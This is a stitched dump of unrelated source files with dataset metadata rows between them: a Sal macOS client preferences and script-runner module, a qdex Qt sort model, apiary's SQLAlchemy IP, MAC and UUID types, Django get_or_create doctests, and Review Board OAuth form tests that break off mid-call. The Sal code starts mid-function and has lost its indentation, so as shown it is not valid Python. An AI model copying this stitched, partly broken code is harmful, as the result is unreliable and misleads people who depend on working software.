# Assume that any passed certs are by CN since they don't
# exist as files anywhere.
# If we're going to use the keychain, we need to use a
# macsesh
logging.debug("Using MacKeychainClient")
client = get_sal_client(MacKeychainClient)
if ca_cert:
client.verify = ca_cert
if cert:
client.cert = (cert, key) if key else cert
basic_auth = sal_pref("BasicAuth")
if basic_auth:
key = sal_pref("key", "")
client.auth = ("sal", key)
client.base_url = sal_pref("ServerURL")
def mac_pref(domain, key, default=None):
val = CFPreferencesCopyAppValue(key, domain)
return val if val is not None else default
def set_sal_pref(pref_name, pref_value):
"""Sets a Sal preference.
The preference file on disk is located at
/Library/Preferences/com.github.salopensource.sal.plist. This should
normally be used only for 'bookkeeping' values; values that control
the behavior of munki may be overridden elsewhere (by MCX, for
example)
"""
try:
CFPreferencesSetValue(
pref_name,
pref_value,
BUNDLE_ID,
kCFPreferencesAnyUser,
kCFPreferencesCurrentHost,
)
CFPreferencesAppSynchronize(BUNDLE_ID)
except Exception:
pass
def sal_pref(pref_name, default=None):
"""Return a preference value.
Since this uses CFPreferencesCopyAppValue, Preferences can be defined
several places. Precedence is:
- MCX
- /var/root/Library/Preferences/com.github.salopensource.sal.plist
- /Library/Preferences/com.github.salopensource.sal.plist
- default_prefs defined here.
Returned values are all converted to native python types through the
`unobjctify` function; e.g. dates are returned as aware-datetimes,
NSDictionary to dict, etc.
"""
default_prefs = {
"ServerURL": "http://sal",
"osquery_launchd": "com.facebook.osqueryd.plist",
"SkipFacts": [],
"SyncScripts": True,
"BasicAuth": True,
"GetGrains": False,
"GetOhai": False,
"LastRunWasOffline": False,
"SendOfflineReport": False,
}
pref_value = mac_pref(BUNDLE_ID, pref_name, default)
if pref_value is None and pref_name in default_prefs:
# If we got here, the pref value was either set to None or never
# set, AND the default was also None. Fall back to auto prefs.
pref_value = default_prefs.get(pref_name)
# we're using a default value. We'll write it out to
# /Library/Preferences/<BUNDLE_ID>.plist for admin
# discoverability
set_sal_pref(pref_name, pref_value)
return unobjctify(pref_value)
def forced(pref, bundle_identifier=BUNDLE_ID):
return CFPreferencesAppValueIsForced(pref, bundle_identifier)
def prefs_report():
prefs = (
"ServerURL",
"key",
"BasicAuth",
"SyncScripts",
"SkipFacts",
"CACert",
"SendOfflineReport",
"SSLClientCertificate",
"SSLClientKey",
"MessageBlacklistPatterns",
)
return {k: {"value": sal_pref(k), "forced": forced(k)} for k in prefs}
def unobjctify(element, safe=False):
"""Recursively convert nested elements to native python datatypes.
Types accepted include str, bytes, int, float, bool, None, list,
dict, set, tuple, NSArray, NSDictionary, NSData, NSDate, NSNull.
element: Some (potentially) nested data you want to convert.
safe: Bool (defaults to False) whether you want printable
representations instead of the python equivalent. e.g. NSDate
safe=True becomes a str, safe=False becomes a datetime.datetime.
NSData safe=True bcomes a hex str, safe=False becomes bytes. Any
type not explicitly handled by this module will raise an
exception unless safe=True, where it will instead replace the
data with a str of '<UNSUPPORTED TYPE>'
This is primarily for safety in serialization to plists or
output.
returns: Python equivalent of the original input.
e.g. NSArray -> List, NSDictionary -> Dict, etc.
raises: ValueError for any data that isn't supported (yet!) by this
function.
"""
supported_types = (str, bytes, int, float, bool, datetime.datetime)
if isinstance(element, supported_types):
return element
elif isinstance(element, (dict, NSDictionary)):
return {k: unobjctify(v, safe=safe) for k, v in element.items()}
elif isinstance(element, (list, NSArray)):
return [unobjctify(i, safe=safe) for i in element]
elif isinstance(element, set):
return {unobjctify(i, safe=safe) for i in element}
elif isinstance(element, tuple):
return tuple([unobjctify(i, safe=safe) for i in element])
elif isinstance(element, NSData):
return binascii.hexlify(element) if safe else bytes(element)
elif isinstance(element, NSDate):
return (
str(element)
if safe
else datetime.datetime.strptime(element.description(), ISO_TIME_FORMAT)
)
elif isinstance(element, NSNull) or element is None:
return "" if safe else None
elif safe:
return "<UNSUPPORTED TYPE>"
raise ValueError(f"Element type '{type(element)}' is not supported!")
def script_is_running(scriptname):
"""Returns Process ID for a running python script.
Not at all stolen from Munki. Honest.
"""
cmd = ["/bin/ps", "-eo", "pid=,command="]
proc = subprocess.Popen(
cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
out, _ = proc.communicate()
mypid = os.getpid()
for line in out.splitlines():
try:
pid, process = line.split(maxsplit=1)
except ValueError:
# funky process line, so we'll skip it
pass
else:
args = process.split()
try:
# first look for Python processes
if "MacOS/Python" in args[0] or "python" in args[0]:
# look for first argument being scriptname
if scriptname in args[1]:
try:
if int(pid) != mypid:
return True
except ValueError:
# pid must have some funky characters
pass
except IndexError:
pass
# if we get here we didn't find a Python script with scriptname
# (other than ourselves)
return False
def run_scripts(dir_path, cli_args=None, error=False):
results = []
skip_names = {"__pycache__"}
scripts = (p for p in pathlib.Path(dir_path).iterdir() if p.name not in skip_names)
for script in scripts:
if not os.access(script, os.X_OK):
results.append(f"'{script}' is not executable or has bad permissions")
continue
cmd = [script]
if cli_args:
cmd.append(cli_args)
try:
subprocess.check_call(cmd)
results.append(f"'{script}' ran successfully")
except (OSError, subprocess.CalledProcessError):
errormsg = f"'{script}' had errors during execution!"
if not error:
results.append(errormsg)
else:
raise RuntimeError(errormsg)
return results
def wait_for_script(scriptname, repeat=3, pause=1):
"""Tries a few times to wait for a script to finish."""
count = 0
while count < repeat:
if script_is_running(scriptname):
time.sleep(pause)
count += 1
else:
return False
return True
|
apache-2.0
| -577,093,192,578,006,400 | 31.725632 | 91 | 0.615996 | false |
encukou/qdex
|
qdex/sortmodel.py
|
1
|
4407
|
#!/usr/bin/env python
# Encoding: UTF-8
"""Part of qdex: a Pokédex using PySide and veekun's pokedex library.
A sort clause model
"""
from PySide import QtCore, QtGui
Qt = QtCore.Qt
from qdex.querybuilder import QueryBuilder
class ColumnIndices(object):
name = 0
order = 1
_count = 2
class SortModel(QtCore.QAbstractItemModel):
"""A model that keeps track of sort criteria
"""
collapsingPossible = False
_pagesize = 1000
def __init__(self, queryModel, clauses):
super(SortModel, self).__init__()
self.clauses = clauses
self.queryModel = queryModel
self.g = queryModel.g
self.g.registerRetranslate(self.allDataChanged)
def allDataChanged(self):
"""Called when all of the data is changed, e.g. retranslated"""
self.dataChanged.emit(
self.index(0, 0),
self.index(self.rowCount() - 1, self.columnCount() - 1),
)
self.headerDataChanged.emit(Qt.Horizontal, 0, self.columnCount() - 1)
def columnCount(self, parent=QtCore.QModelIndex()):
if parent.isValid():
return 0
else:
return ColumnIndices._count
def data(self, index, role=Qt.DisplayRole):
clause = self.clauses[index.row()]
if role == Qt.UserRole:
return clause
if index.column() == ColumnIndices.name:
column = clause.column
if column:
return column.headerData(role, self.queryModel)
else:
if role == Qt.DisplayRole:
return clause.name
elif index.column() == ColumnIndices.order:
if role == Qt.DisplayRole:
if clause.descending:
return u'↑'
else:
return u'↓'
def index(self, row, column=0, parent=QtCore.QModelIndex()):
if isinstance(row, int):
if not parent.isValid():
if 0 <= row < self.rowCount() and 0 <= column < self.columnCount():
return self.createIndex(row, column)
else:
return self.clauses.index(row)
def rowCount(self, parent=QtCore.QModelIndex()):
if parent.isValid():
return 0
else:
return len(self.clauses)
def parent(self, index):
return QtCore.QModelIndex()
def clear(self):
while self.clauses:
del self[len(self) - 1]
# List-like methods
def __iter__(self): return iter(self.clauses)
def __getitem__(self, i): return self.clauses[i]
def __len__(self): return len(self.clauses)
def append(self, clause):
builder = QueryBuilder(self.queryModel.baseQuery,
self.queryModel.mappedClass)
# Remove overridden clauses
while True:
# To prevent problems with list index reordering, we remove one
# clause at a time.
for i, existingClause in enumerate(self.clauses):
if existingClause.overrides(clause, builder):
del self[i]
break
else:
# All overridden clauses removed; add the new one
self.beginInsertRows(QtCore.QModelIndex(),
len(self.clauses), len(self.clauses))
self.clauses.append(clause)
self.endInsertRows()
return
def __setitem__(self, index, clause):
self.clauses[index] = clause
self.dataChanged.emit(self.index(index, 0),
self.index(index, self.columnCount() - 1))
def __delitem__(self, index):
self.beginRemoveRows(QtCore.QModelIndex(), index, index)
del self.clauses[index]
self.endRemoveRows()
def replace(self, old, new):
self[self.clauses.index(old)] = new
def remove(self, clause):
del self[self.clauses.index(clause)]
def increase_priority(self, clause, amount=1):
index = self.clauses.index(clause)
del self[index]
index += amount
if index < 0: index = 0
if index >= len(self): index = len(self)
self.beginInsertRows(QtCore.QModelIndex(), index, index)
self.clauses.insert(index, clause)
self.endInsertRows()
def decrease_priority(self, clause, amount=1):
self.increase_priority(clause, -amount)
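# Illustrative usage (not part of the original module): the model behaves
# like a priority-ordered list of clauses, so callers can do e.g.
#
#   model.append(clause)             # drops any clauses this one overrides
#   model.increase_priority(clause)  # move the clause one position
#   model.remove(clause)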
|
mit
| -1,209,521,007,371,778,800 | 30.898551 | 83 | 0.575875 | false |
gmr/apiary
|
apiary/types.py
|
1
|
4503
|
"""
Definition of additional SQLAlchemy types
"""
import json
import logging
import re
import uuid

import ipaddr
from sqlalchemy.dialects import mysql
from sqlalchemy.dialects import postgres
from sqlalchemy import types
LOGGER = logging.getLogger(__name__)
def is_ipv4_address(value):
try:
ipaddr.IPv4Address(value)
except ipaddr.AddressValueError:
return False
return True
def is_ipv6_address(value):
try:
ipaddr.IPv6Address(value)
except ipaddr.AddressValueError:
return False
return True
class IPAddress(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(45))
def process_bind_param(self, value, dialect):
if value and not is_ipv4_address(value) and not is_ipv6_address(value):
raise ValueError('Could not validate IPv4 or IPv6 format: %s',
value)
return value
class IPv4Address(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(15))
def process_bind_param(self, value, dialect):
if value and not is_ipv4_address(value):
raise ValueError('Could not validate IPv4 format: %s', value)
return value
class IPv6Address(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's inet type or Text"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.INET())
return dialect.type_descriptor(types.CHAR(45))
def process_bind_param(self, value, dialect):
if value and not is_ipv6_address(value):
raise ValueError('Could not validate IPv6 format: %s', value)
return value
class MacAddress(types.TypeDecorator):
"""Abstract the IP address so it uses PostgreSQL's macaddr type or Text"""
impl = types.TEXT
PATTERN = re.compile(r'^([0-9A-F]{2}[:-]){5}([0-9A-F]{2})$')
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.MACADDR())
return dialect.type_descriptor(types.CHAR(17))
def process_bind_param(self, value, dialect):
if value and not self.PATTERN.match(value):
raise ValueError('Could not validate MAC Address format: %s', value)
return value
class JSONEncodedValue(types.TypeDecorator):
"""Represents an immutable structure as a json-encoded string from
SQLAlchemy doc example
Usage::
JSONEncodedValue()
"""
impl = types.TEXT
def process_bind_param(self, value, dialect):
if value is not None:
value = json.dumps(value)
return value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
class UUID(types.TypeDecorator):
"""UUID column type for SQLAlchemy based on SQLAlchemy doc examples for GUID
and an example from Tom Willis for MySQL:
http://blog.sadphaeton.com/2009/01/19/sqlalchemy-recipeuuid-column.html
"""
impl = types.TEXT
def load_dialect_impl(self, dialect):
if dialect.name == 'mysql':
return dialect.type_descriptor(mysql.MSBinary)
if dialect.name == 'postgresql':
return dialect.type_descriptor(postgres.UUID())
else:
return dialect.type_descriptor(types.CHAR(32))
def process_bind_param(self, value, dialect=None):
if not value:
return None
        if isinstance(value, uuid.UUID):
            if dialect.name == 'mysql':
                return value.bytes
            # postgresql and the generic CHAR fallback both take the string form
            return str(value)
return str(uuid.UUID('urn:uuid:%s' % value))
def process_result_value(self, value, dialect=None):
if value:
return uuid.UUID(value)
return None
def is_mutable(self):
return False
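# Illustrative usage (not part of the original module): declaring columns
# with these custom types. `Base` is an assumed declarative base, not
# something defined in this file.
#
#   from sqlalchemy import Column
#
#   class Node(Base):
#       __tablename__ = 'nodes'
#       id = Column(UUID(), primary_key=True, default=uuid.uuid4)
#       address = Column(IPAddress())
#       mac = Column(MacAddress())
#       extra = Column(JSONEncodedValue())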
|
bsd-3-clause
| 8,459,731,531,724,355,000 | 28.24026 | 80 | 0.641572 | false |
hugs/django
|
tests/modeltests/get_or_create/models.py
|
1
|
1805
|
"""
33. get_or_create()
``get_or_create()`` does what it says: it tries to look up an object with the
given parameters. If an object isn't found, it creates one with the given
parameters.
"""
from django.db import models
class Person(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
birthday = models.DateField()
def __unicode__(self):
return u'%s %s' % (self.first_name, self.last_name)
__test__ = {'API_TESTS':"""
# Acting as a divine being, create a Person.
>>> from datetime import date
>>> p = Person(first_name='John', last_name='Lennon', birthday=date(1940, 10, 9))
>>> p.save()
# Only one Person is in the database at this point.
>>> Person.objects.count()
1
# get_or_create() a person with similar first names.
>>> p, created = Person.objects.get_or_create(first_name='John', last_name='Lennon', defaults={'birthday': date(1940, 10, 9)})
# get_or_create() didn't have to create an object.
>>> created
False
# There's still only one Person in the database.
>>> Person.objects.count()
1
# get_or_create() a Person with a different name.
>>> p, created = Person.objects.get_or_create(first_name='George', last_name='Harrison', defaults={'birthday': date(1943, 2, 25)})
>>> created
True
>>> Person.objects.count()
2
# If we execute the exact same statement, it won't create a Person.
>>> p, created = Person.objects.get_or_create(first_name='George', last_name='Harrison', defaults={'birthday': date(1943, 2, 25)})
>>> created
False
>>> Person.objects.count()
2
# If you don't specify a value or default value for all required fields, you
# will get an error.
>>> p, created = Person.objects.get_or_create(first_name='Tom', last_name='Smith')
Traceback (most recent call last):
...
IntegrityError:...
"""}
|
bsd-3-clause
| 8,306,876,578,060,972,000 | 29.083333 | 130 | 0.684765 | false |
reviewboard/reviewboard
|
reviewboard/oauth/tests.py
|
2
|
25500
|
"""Tests for OAuth2 Applications."""
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser, User
from django.core.urlresolvers import reverse
from django.core.exceptions import ValidationError
from django.forms.models import model_to_dict
from djblets.testing.decorators import add_fixtures
from reviewboard.oauth.forms import (ApplicationChangeForm,
ApplicationCreationForm,
UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
class ApplicationTests(TestCase):
"""Tests for Application."""
fixtures = ['test_users']
def test_is_accessible_by_with_anonymous(self):
"""Testing Application.is_accessible_by with anonyomus user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_accessible_by(AnonymousUser()))
def test_is_accessible_by_with_owner(self):
"""Testing Application.is_accessible_by with owner"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_accessible_by(user))
def test_is_accessible_by_with_other_user(self):
"""Testing Application.is_accessible_by with other user"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_accessible_by(other_user))
def test_is_accessible_by_with_superuser(self):
"""Testing Application.is_accessible_by with superuser"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='admin')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_accessible_by(admin))
def test_is_accessible_by_with_local_site_and_owner(self):
"""Testing Application.is_accessible_by with LocalSite and owner"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_accessible_by(user,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_other_user(self):
"""Testing Application.is_accessible_by with LocalSite and other user
"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, other_user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertFalse(application.is_accessible_by(other_user,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_admin(self):
"""Testing Application.is_accessible_by with LocalSite and LocalSite
administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, admin)
local_site.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_accessible_by(admin,
local_site=local_site))
def test_is_accessible_by_with_local_site_and_other_site_admin(self):
"""Testing Application.is_accessible_by with LocalSite and other
LocalSite administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site1 = LocalSite.objects.create(name='site1')
local_site1.users.add(user)
local_site2 = LocalSite.objects.create(name='site2')
local_site2.users.add(admin)
local_site2.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site1)
self.assertFalse(application.is_accessible_by(admin,
local_site=local_site1))
def test_is_mutable_by_with_anonymous(self):
"""Testing Application.is_mutable_by with anonyomus user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_mutable_by(AnonymousUser()))
def test_is_mutable_by_with_owner(self):
"""Testing Application.is_mutable_by with owner"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_mutable_by(user))
def test_is_mutable_by_with_other_user(self):
"""Testing Application.is_mutable_by with other user"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
application = self.create_oauth_application(user=user)
self.assertFalse(application.is_mutable_by(other_user))
def test_is_mutable_by_with_superuser(self):
"""Testing Application.is_mutable_by with superuser"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='admin')
application = self.create_oauth_application(user=user)
self.assertTrue(application.is_mutable_by(admin))
def test_is_mutable_by_with_local_site_and_owner(self):
"""Testing Application.is_mutable_by with LocalSite and owner"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_mutable_by(user,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_other_user(self):
"""Testing Application.is_mutable_by with LocalSite and other user
"""
user = User.objects.get(username='doc')
other_user = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, other_user)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertFalse(application.is_mutable_by(other_user,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_admin(self):
"""Testing Application.is_mutable_by with LocalSite and LocalSite
administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site = LocalSite.objects.create(name='site1')
local_site.users.add(user, admin)
local_site.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site)
self.assertTrue(application.is_mutable_by(admin,
local_site=local_site))
def test_is_mutable_by_with_local_site_and_other_site_admin(self):
"""Testing Application.is_mutable_by with LocalSite and other
LocalSite administrator
"""
user = User.objects.get(username='doc')
admin = User.objects.get(username='dopey')
local_site1 = LocalSite.objects.create(name='site1')
local_site1.users.add(user)
local_site2 = LocalSite.objects.create(name='site2')
local_site2.users.add(admin)
local_site2.admins.add(admin)
application = self.create_oauth_application(user=user,
local_site=local_site1)
self.assertFalse(application.is_mutable_by(admin,
local_site=local_site1))
class ApplicationChangeFormTests(TestCase):
"""Tests for the ApplicationChangeForm."""
fixtures = ['test_users']
def test_reassign_client_id(self):
"""Testing ApplicationChangeForm cannot re-assign client_id"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
original_id = application.client_id
form = ApplicationChangeForm(
data=dict(
model_to_dict(
instance=application,
fields=ApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret')
),
client_id='foo',
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.client_id, original_id)
def test_reassign_client_secret(self):
"""Testing ApplicationChangeForm cannot re-assign client_secret"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
original_secret = application.client_secret
form = ApplicationChangeForm(
data=dict(
model_to_dict(
instance=application,
fields=ApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret')
),
client_secret='bar',
),
instance=application,
)
        self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.client_secret, original_secret)
def test_grant_implicit_no_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_IMPLICIT and no
URIs matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_IMPLICIT, False)
def test_grant_implicit_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_IMPLICIT and URIs
matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_IMPLICIT, True)
def test_grant_authorization_code_no_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_AUTHORIZATION_CODE and no URIs matches
AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_AUTHORIZATION_CODE, False)
def test_grant_authorization_code_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_AUTHORIZATION_CODE and URIS matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_AUTHORIZATION_CODE, True)
def test_grant_password_no_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_PASSWORD and no
URIs matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_PASSWORD, True)
def test_grant_password_uris(self):
"""Testing ApplicationChangeForm.clean() with GRANT_PASSWORD and URIs
matches AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'http://example.com/', Application.GRANT_PASSWORD, True)
def test_grant_client_credentials_no_uris(self):
"""Testing ApplicationChangeForm.clean() with
GRANT_CLIENT_CREDENTIALS and no URIs matches
AbstractApplication.clean()
"""
self._test_redirect_uri_grant_combination(
'', Application.GRANT_CLIENT_CREDENTIALS, True)
    def test_grant_client_credentials_uris(self):
        """Testing ApplicationChangeForm.clean() with
        GRANT_CLIENT_CREDENTIALS and URIs matches
        AbstractApplication.clean()
        """
        self._test_redirect_uri_grant_combination(
            'http://example.com/', Application.GRANT_CLIENT_CREDENTIALS, True)
@add_fixtures(['test_site'])
def test_enable_disabled_for_security(self):
"""Testing ApplicationChangeForm will not enable an application
disabled for security
"""
local_site = LocalSite.objects.get(pk=1)
admin = User.objects.get(username='admin')
owner = User.objects.get(username='doc')
local_site.users.remove(owner)
application = self.create_oauth_application(user=admin,
local_site=local_site,
enabled=False,
original_user=owner)
self.assertTrue(application.is_disabled_for_security)
self.assertEqual(application.original_user, owner)
form = ApplicationChangeForm(
data=dict(model_to_dict(application),
enabled=True),
instance=application,
)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[ApplicationCreationForm.DISABLED_FOR_SECURITY_ERROR])
def _test_redirect_uri_grant_combination(self, redirect_uris, grant_type,
is_valid):
doc = User.objects.get(username='doc')
common_fields = {
'authorization_grant_type': grant_type,
'redirect_uris': redirect_uris,
}
application = self.create_oauth_application(user=doc)
# This should always succeed.
super(Application, application).clean()
form = ApplicationChangeForm(
data=dict(model_to_dict(application), **common_fields),
instance=application,
)
self.assertEqual(form.is_valid(), is_valid)
application = Application(user=doc, **common_fields)
# Ensure that the error cases of AbstractApplication.clean() matches
# our implementation.
if is_valid:
super(Application, application).clean()
else:
self.assertIn('redirect_uris', form.errors)
with self.assertRaises(ValidationError):
super(Application, application).clean()
class ApplicationCreationFormTests(TestCase):
"""Tests for the ApplicationCreationForm."""
fixtures = ['test_users']
def test_valid_client_id_and_secret(self):
"""Testing ApplicationCreationForm sets a valid client_id and
client_secret
"""
form = ApplicationCreationForm(data={
'authorization_grant_type': Application.GRANT_CLIENT_CREDENTIALS,
'client_id': 'foo',
'client_type': Application.CLIENT_PUBLIC,
'client_secret': 'bar',
'enabled': True,
'name': 'Test Application',
'redirect_uris': '',
'user': 1,
})
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_id, form.data['client_id'])
self.assertNotEqual(application.client_secret,
form.data['client_secret'])
self.assertGreater(len(application.client_id), 0)
self.assertGreater(len(application.client_secret), 0)
class UserApplicationCreationFormTests(TestCase):
"""Tests for the UserApplicationCreationForm."""
fixtures = ['test_users']
def test_set_user(self):
"""Testing UserApplicationCreationForm cannot assign different user"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'user': 2,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.user, user)
@add_fixtures(['test_site'])
def test_assign_local_site(self):
"""Testing UserApplicationCreationForm with Local Site"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.get(name=self.local_site_name)
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'local_site': local_site.pk
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.local_site, local_site)
    def test_assign_local_site_inaccessible(self):
        """Testing UserApplicationCreationForm with an inaccessible Local Site
        """
        local_site = LocalSite.objects.create(name='inaccessible')
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'local_site': local_site.pk
},
)
self.assertFalse(form.is_valid())
def test_set_extra_data(self):
"""Testing UserApplicationCreationForm cannot assign extra_data"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
'extra_data': 1,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.extra_data, {})
def test_set_skip_authorization(self):
"""Testing UserApplicationCreationForm cannot assign
skip_authorization
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
                'skip_authorization': True,
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.skip_authorization, False)
def test_set_client_id(self):
"""Testing UserApplicationCreationForm cannot assign client_id
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_id': 'foo',
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_id, 'foo')
self.assertNotEqual(len(application.client_id), 0)
def test_set_client_secret(self):
"""Testing UserApplicationCreationForm cannot assign client_secret
"""
user = User.objects.get(username='doc')
form = UserApplicationCreationForm(
user,
data={
'authorization_grant_type': Application.GRANT_IMPLICIT,
'client_secret': 'bar',
'client_type': Application.CLIENT_PUBLIC,
'name': 'test',
'redirect_uris': 'http://example.com',
},
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertNotEqual(application.client_secret, 'bar')
self.assertNotEqual(len(application.client_secret), 0)
class UserApplicationChangeFormTests(TestCase):
"""Tests for the UserApplicationChangeForm."""
fixtures = ['test_users']
def test_reassign_user(self):
"""Testing UserApplicationChangeForm cannot re-assign different user"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
user=2,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.user, user)
@add_fixtures(['test_site'])
def test_reassign_local_site(self):
"""Testing UserApplicationChangeForm cannot re-assign Local Site"""
user = User.objects.get(username='doc')
local_site = LocalSite.objects.get(pk=1)
application = self.create_oauth_application(user, local_site)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
local_site=2,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.local_site, local_site)
def test_reassign_extra_data(self):
"""Testing UserApplicationChangeForm cannot re-assign extra_data"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
extra_data=1,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.extra_data, {})
def test_reassign_skip_authorization(self):
"""Testing UserApplicationChangeForm cannot re-assign
skip_authorization
"""
user = User.objects.get(username='doc')
application = self.create_oauth_application(user)
form = UserApplicationChangeForm(
user,
data=dict(
model_to_dict(
instance=application,
fields=UserApplicationChangeForm.base_fields,
exclude=('client_id', 'client_secret'),
),
skip_authorization=True,
),
instance=application,
)
self.assertTrue(form.is_valid())
application = form.save()
self.assertEqual(application.skip_authorization, False)
class OAuthAdminTests(TestCase):
"""Tests for reviewboard.oauth.admin."""
fixtures = ['test_users']
def test_oauth_form_redirect(self):
"""Testing that a OAuth form can render on page, and saves data
correctly
"""
self.assertTrue(self.client.login(username='admin', password='admin'))
test_user = User.objects.latest('pk')
add_url = reverse('admin:oauth_application_add')
response = self.client.get(add_url)
self.assertEqual(response.status_code, 200)
response = self.client.post(
add_url,
{
'authorization_grant_type':
Application.GRANT_CLIENT_CREDENTIALS,
